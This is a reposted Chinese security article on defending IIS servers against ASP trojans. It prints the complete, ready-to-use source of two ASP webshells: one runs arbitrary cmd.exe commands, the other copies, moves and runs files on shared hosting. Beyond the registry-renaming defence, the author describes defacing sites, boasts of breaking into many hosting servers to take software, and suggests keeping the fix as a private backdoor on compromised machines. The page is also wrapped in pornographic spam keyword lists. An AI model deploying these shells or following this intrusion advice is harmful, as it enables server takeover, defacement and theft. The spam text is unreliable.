欧美一区二区三区免费高_免费国产在线视频_国产在线91精品入口_国产精品毛片在线完整版sa

 
售房快車 售房客車 房屋租賃 牽線搭橋 供求信息 南陽人才網 文藝沙龍
 
域名注冊 虛擬主機 云服務器 企業云郵箱 網站制作 網站推廣 無紙辦公 成功案例
   
服務熱線:0377-63392646 13782137062
虛擬主機  
好男人好资源在线视频观看影院,国产综合影院,日韩欧美在线中文字幕
· 網 絡 學 院
·友情鏈接 更多>>>
標題:防范ASP木馬

 
隨著ASP 技術的發展,網絡上基于ASP技術開發的網站越來越多,對ASP技術的支持可以說已經是windows系統IIS服務器的一項基本功能。但是基于ASP技術的木馬后門,也越來越多,而且功能也越來越強大。由于ASP它本身是服務器提供的一貢服務功能,所以這種ASP腳本的木馬后門,不會被殺毒軟件查殺。被黑客們稱為"永遠不會被查殺的后門"。由于其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防范和清除,為我們的網管人員提出了更高的技術要求。下面我結合個人的經驗,談一下對兩款比較典型的ASP 木馬的防范方法,希望對大家能夠有所幫助。

  以下是第一款木馬的代碼:
  <title>ASP Shell</title>
  <%@ Language=VBScript %>
  <%
  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile
  On Error Resume Next
  -- create the COM objects that we will be using --
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  -- check for a command that we have posted --
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then
  -- Use a poor mans pipe ... a temp file --
  szTempFile = "C:\" & oFileSys.GetTempName( )
  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
  Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
  End If
  %>
  <HTML>
  <BODY>
  <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type=text name=".CMD" size=45 value="<%= szCMD %>">
  <input type=submit value="執行命令">
  </FORM>
  <PRE><%
  If (IsObject(oFile)) Then
  -- Read the output from our command and remove the temp file --
  On Error Resume Next
  Response.Write Server.HTMLEncode(oFile.ReadAll)
  oFile.Close
  Call oFileSys.DeleteFile(szTempFile, True)
  End If
  %>
  </BODY>
  </HTML>
  運行后如下圖: 在命令行里輸入DIR命令點執行就可以查看目錄了!它可以使用各種DOS命令,如:copy、net、netstat等。
  但是它的默認執行權限只有GUEST,也就是IUSR_COMPUTER用戶的執行權限。當然如果你把IUSR_COMPUTER用戶加入管理員組,那么你就有管理員權限了。這一款木馬的特點是,使用很方便。幾乎就想當于DOS命令行窗口xx作一樣。但是如果服務器限制了FSO(無組件上傳),那么它是沒有辦法使用了。還有就是在服務器以后增加的虛擬主機里也沒有辦法使用。只能在"默認 Web 站點"里使用,所以它相對的適用范圍較窄。
  對于防范方法讓我們看一下它的代碼就知道了:
  Set oScript = Server.CreateObject("WSCRIPT.SHELL") "建立了一個名為oScript的WSCRIPT.SHELL對象,用于命令的執行"
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
  上面三行代碼創建了WSCRIPT.SHELL、WSCRIPT.NETWORK、Scripting.FileSystemObject三個對象,我們只要在注冊表中把控制WSCRIPT.SHELL對象的項改名或刪除就可以了。如下圖:值得注意的是:我們應該把"WSCRIPT.SHELL"項和"WSCRIPT.SHELL.1"這兩項都要改名或刪除。因為如我們只修改"WSCRIPT.SHELL"項的話。那么黑客們只要把代碼修改如下:Set oScript = Server.CreateObject("WSCRIPT.SHELL.1") 這個后門木馬就又可以執行了。
  大家可能已經想到了,我們在對"WSCRIPT.SHELL"項和"WSCRIPT.SHELL.1"改名時,一定要不容易被黑客們猜到,因為例如:你把"WSCRIPT.SHELL"改成了"WSCRIPT.SHELL888"。黑客們只要把代碼相應的改成:Set oScript = Server.CreateObject("WSCRIPT.SHELL888"),木馬程序就又可以執行了。還有就修改了注冊表以后要重起WEB服務,設置才會有效。
  接下來讓我們再來看下一款ASP后門木馬程序的代碼:
  <%response.write "<font size=6 color=red>一次只能執行一個xx作</font>" %>
  <%response.write now()%><BR>程序所在的物理路徑:
  <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
  <html>
  <title>asps shell.application backdoor </title>
  <body>
  <form action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type=text name=text value="<%=szCMD %>"> 輸入要瀏覽的目錄<br>
  <input type=text name=text1 value="<%=szCMD1 %>">
  copy
  <input type=text name=text2 value="<%=szCMD2 %>"><br>
  <input type=text name=text3 value="<%=szCMD3 %>">
  move
  <input type=text name=text4 value="<%=szCMD4 %>"><br>
  路徑:<input type=text name=text5 value="<%=szCMD5 %>">
  程序:<input type=text name=text6 value="<%=szCMD6 %>"><br>
  <input type=submit name=sb value=發送命令>
  </form>
  </body>
  </html>
  <%
  szCMD = Request.Form("text") 目錄瀏覽
  if (szCMD <> "") then
  set shell=server.createobject("shell.application") 建立shell對象
  set fod1=shell.namespace(szcmd)
  set foditems=fod1.items
  for each co in foditems
  response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
  next
  end if
  %> <%
  szCMD1 = Request.Form("text1") 目錄拷貝,不能進行文件拷貝
  szCMD2 = Request.Form("text2")
  if szcmd1<>"" and szcmd2<>"" then
  set shell1=server.createobject("shell.application") 建立shell對象
  set fod1=shell1.namespace(szcmd2)
  for i=len(szcmd1) to 1 step -1
  if mid(szcmd1,i,1)="\" then
  path=left(szcmd1,i-1)
  exit for
  end if
  next
  if len(path)=2 then path=path & "\"
  path2=right(szcmd1,len(szcmd1)-i)
  set fod2=shell1.namespace(path)
  set foditem=fod2.parsename(path2)
  fod1.copyhere foditem
  response.write "command completed success!"
  end if
  %> <%
  szCMD3 = Request.Form("text3") 目錄移動
  szCMD4 = Request.Form("text4")
  if szcmd3<>"" and szcmd4<>"" then
  set shell2=server.createobject("shell.application") 建立shell對象
  set fod1=shell2.namespace(szcmd4) for i=len(szcmd3) to 1 step -1
  if mid(szcmd3,i,1)="\" then
  path=left(szcmd3,i-1)
  exit for
  end if
  next if len(path)=2 then path=path & "\"
  path2=right(szcmd3,len(szcmd3)-i)
  set fod2=shell2.namespace(path)
  set foditem=fod2.parsename(path2)
  fod1.movehere foditem
  response.write "command completed success!"
  end if
  %>
  <%
  szCMD5 = Request.Form("text5") 執行程序要指定路徑
  szCMD6 = Request.Form("text6")
  if szcmd5<>"" and szcmd6<>"" then
  set shell3=server.createobject("shell.application") 建立shell對象
  shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
  response.write "command completed success!"
  end if
  %>
  執行后如下圖:要查看目錄,只要輸入相應的目錄,點發送命令就可以了。如下圖:
  這個木馬程可以完成文件的COPY、MOVE,和執行程序。但很多命令都不能用,例如:del、net、netstat等。這個木馬程的功能隨然簡單,但是用它來黑一個網站是足夠了。比如,我們可以把網站的首頁MOVE到其它地方,然后我們再COPY一個同名的黑客網頁進去,就行了。
  最要命的是這個木馬適用于任何虛擬主機之中,也就是說我只要是服務器中的一個虛擬空間的用戶,我就可以傳這個木馬上去,并用它來修改其它任何用戶的主頁。所以如果哪些提供虛擬空間的服務商沒有打補丁的話,那真是死定了。
  然而在我的實踐中發現,中國很多的虛擬空間服務商,特別是一些小型的服務商都沒有打補丁。我利用這一漏洞拿到了很多虛擬空間服務器的ADMIN,然后好心的幫他們補上漏洞。當然我也得到了我想得到的東西——很多好的軟件和代碼。我現在用著的很多ASP程序就是從他們那上面偷下來,太難聽了,應該說DOWN下來的才對。
  言歸正傳,我們應該怎樣來防范這個ASP后門木馬程序呢?讓我們看一下它其中的這一句代碼:set shell=server.createobject("shell.application"),跟剛才的方法一樣,如下圖:
  我們只要把"shell.application"項和"shell.application.1"項改名或刪除就可以了。記住了,如果是改名,要改得復雜一點,不要讓黑客們一下就猜到了。順便說一句,如果是你給肉雞打補丁最好是改名,并把名字記下來,這樣也就成為自己一個隱密的后門了。最后對這兩款ASP木馬后門,以及如何防范ASP木馬后門做一下總結:第一款木馬功能上強大一些, 但適用范圍窄,需要FSO支持也就是"Scripting.FileSystemObject"項的支持。第二款木馬雖然功能上少一些,但它創建的是"shell.application"對象。在任何虛擬主機中都適用。(這一點危害確實太大了,提供支持ASP空間的管理員們,你們可得注意了!)
  其實跟據對上面兩款ASP木馬后門的防范,大家可能已經想到了,對于ASP后門木馬的防范,我們只要在注冊表中把"shell.application"、"WSCRIPT.SHELL"等危險的腳本對象(因為它們都是用于創建腳本命令通道的)進行改名或刪除,也就是限制系統對"腳本SHELL"的創建,ASP木馬也就成為無本之木、無米之炊,運行不起來了。
  注:以上代碼復制保存為ASP文件就可以直接使用了。(僅用于測試,不要搞破壞,后果自負。海

  作者:佚名 來源:網絡

 

點擊[5196]次  發布日期: 2007-3-26 21:41:53    發布人:中國開網
:上一篇
  下一篇:

返回首頁 |公司簡介 |開網招聘 |支付說明 |行業新聞 | 聯系方式 |客服中心| 相關咨詢|廣告服務 |郵箱登錄

豫公網安備 41130302000019號


豫ICP備2024042951號

南陽市開網網絡技術有限公司◎0377-63392646

業務專線: 0377-63392646 1378217062

總部地址: 河南省南陽市車站路146號新城百樂大廈13樓12室

業務①QQ:401853676 客服①QQ:776288762 

Email:xuejinfu@kyxxw.com  

Copyright © 2025 南陽市開網網絡技術有限公司 ◇版權所有

中國開網旗下網站:
信息版:m.cjjyzz.com 
網絡版:www.cnkw.cn
成賣網:www.cmai.cn
開網PC手機微信APP小程序五合一網站
www.0377it.cn
www.cnkw.cn
欧美一区二区三区免费高_免费国产在线视频_国产在线91精品入口_国产精品毛片在线完整版sa
欧美日韩一区二区三区在线看 | 国产精品三级视频| 国产精品久久久久久久久搜平片| 国产欧美一区二区精品仙草咪| 国产永久精品大片wwwapp| 中文亚洲视频在线| 久久丁香综合五月国产三级网站| 欧美高清视频一区二区| 国产精品久久国产三级国电话系列| 国语自产精品视频在线看抢先版结局 | 激情六月婷婷久久| 欧美一级久久| 欧美女同视频| 狠狠爱综合网| 中文国产成人精品久久一| 欧美亚洲综合在线| 欧美精品一区二区精品网| 国产精品欧美日韩一区二区| 亚洲天堂黄色| 欧美大片va欧美在线播放| 国产目拍亚洲精品99久久精品| 亚洲欧美国产日韩天堂区| 欧美成人免费小视频| 国产欧美日韩精品一区| 午夜精品成人在线| 午夜免费久久久久| 欧美破处大片在线视频| 激情久久久久| 免费观看欧美在线视频的网站| 国产精品理论片在线观看| 在线一区二区三区四区| 免费在线日韩av| 国产美女精品免费电影| 午夜精品久久久久久久白皮肤| 欧美极品一区二区三区| 国产有码一区二区| 久久深夜福利| 国产欧美日韩视频在线观看| 亚洲图片在线观看| 麻豆九一精品爱看视频在线观看免费| 国产精品欧美风情| 久久国产精品久久久| 欧美午夜理伦三级在线观看| 亚洲图片欧美一区| 欧美精品123区| 在线成人www免费观看视频| 狼狼综合久久久久综合网| 国产欧美日韩精品一区| 久久久国产午夜精品| 国产精品一区二区女厕厕| 久久国产主播精品| 国产精品福利片| 亚洲系列中文字幕| 美国三级日本三级久久99| 国产综合色精品一区二区三区| 久久久www成人免费无遮挡大片| 国产精品久久午夜| 欧美一区亚洲| 国产精品久久午夜夜伦鲁鲁| 欧美综合激情网| 国产九九视频一区二区三区| 久久久99精品免费观看不卡| 国产情人综合久久777777| 久久精品人人爽| 国产精品入口夜色视频大尺度 | 国产九九视频一区二区三区| 久久久久久尹人网香蕉| 国产日韩欧美精品| 久久综合九色综合网站| 国产一区日韩欧美| 欧美成人精品一区| 亚洲综合国产精品| 国产精品视频一区二区三区 | 国产一区二区黄| 久久亚洲一区二区三区四区| 国语自产精品视频在线看一大j8 | 国产精品女主播| 裸体女人亚洲精品一区| 在线日韩视频| 欧美午夜视频一区二区| 久久大综合网| 伊人久久亚洲影院| 国产精品国产精品| 国外成人在线| 欧美国产欧美亚州国产日韩mv天天看完整| 亚洲视频一区| 国产精品视频免费在线观看| 久久亚洲高清| 亚洲一区精品视频| 国产日韩精品电影| 欧美人与性动交α欧美精品济南到| 性色av一区二区三区在线观看| 国产一区二区中文字幕免费看| 欧美激情一区二区三区在线视频| 欧美一区二区三区免费观看视频 | 影音国产精品| 国产精品九九| 蜜桃伊人久久| 亚洲一二三区在线观看| 国产欧美一区二区三区沐欲| 欧美精品一卡二卡| 久久久久www| 亚洲免费一在线| 国产尤物精品| 国产精品美女久久久久aⅴ国产馆| 欧美成人按摩| 久久久久久午夜| 亚洲欧美日韩一区在线| 国内激情久久| 国产精品一区二区久久久久| 尤物yw午夜国产精品视频| 欧美午夜片欧美片在线观看| 欧美华人在线视频| 久久视频一区| 久久国产精品久久国产精品| 亚洲一区免费网站| 黑人巨大精品欧美一区二区小视频| 国产精品久久久久久影院8一贰佰| 欧美韩国日本综合| 久久最新视频| 久久久久久久久久久久久女国产乱| 亚洲综合第一页| 精品二区视频| 国产亚洲人成a一在线v站| 国产精品入口日韩视频大尺度| 欧美综合77777色婷婷| 午夜精品一区二区三区在线视| 国产一区二区三区电影在线观看| 国产精品夫妻自拍| 欧美三日本三级少妇三99| 香蕉成人伊视频在线观看| 国产精品美腿一区在线看 | 欧美中文在线视频| 亚久久调教视频| 亚洲天堂成人| 这里只有精品电影| 一区视频在线| 红桃视频亚洲| 国产日韩欧美综合精品| 老司机一区二区三区| 久久久久高清| 欧美日韩另类在线| 欧美精品videossex性护士| 玖玖精品视频| 欧美肥婆在线| 欧美日韩免费在线| 国产精品白丝jk黑袜喷水| 国产精品美腿一区在线看 | 国产精品老女人精品视频| 国产精品网站一区| 国产婷婷色一区二区三区四区| 韩国免费一区| 亚洲午夜激情网站| 欧美亚洲在线播放| 免费日韩视频| 欧美日韩国产精品自在自线| 欧美性一区二区| 国产一区二区无遮挡| 亚洲一区二区三区精品在线观看 | 欧美日韩在线播放三区四区| 国产精品麻豆va在线播放| 国产午夜精品美女毛片视频| 一区二区亚洲| 欧美一级免费视频| 久久综合一区二区三区| 欧美精品综合| 国产精品一区三区| 亚洲视频福利| 久久精品水蜜桃av综合天堂| 欧美刺激性大交免费视频| 欧美午夜精品久久久久久久 | 美女91精品| 欧美日韩亚洲精品内裤| 国产精品专区第二| **网站欧美大片在线观看| 久久精品二区| 欧美区在线播放| 国产一区二区高清不卡| 午夜久久黄色| 欧美精品系列| 国产亚洲精品美女| 午夜精品一区二区在线观看| 欧美成年人视频网站| 国产精品视频成人| 亚洲一品av免费观看| 久久综合久久综合久久| 国产精品v一区二区三区| 影音先锋中文字幕一区| 久久精品国产亚洲一区二区| 欧美精品一区在线观看| 国精品一区二区| 性刺激综合网| 欧美另类极品videosbest最新版本| 国产免费亚洲高清| 欧美一区二区大片| 欧美日韩高清在线| 在线免费不卡视频| 欧美a级在线| 国产视频一区二区在线观看| 欧美一区视频在线|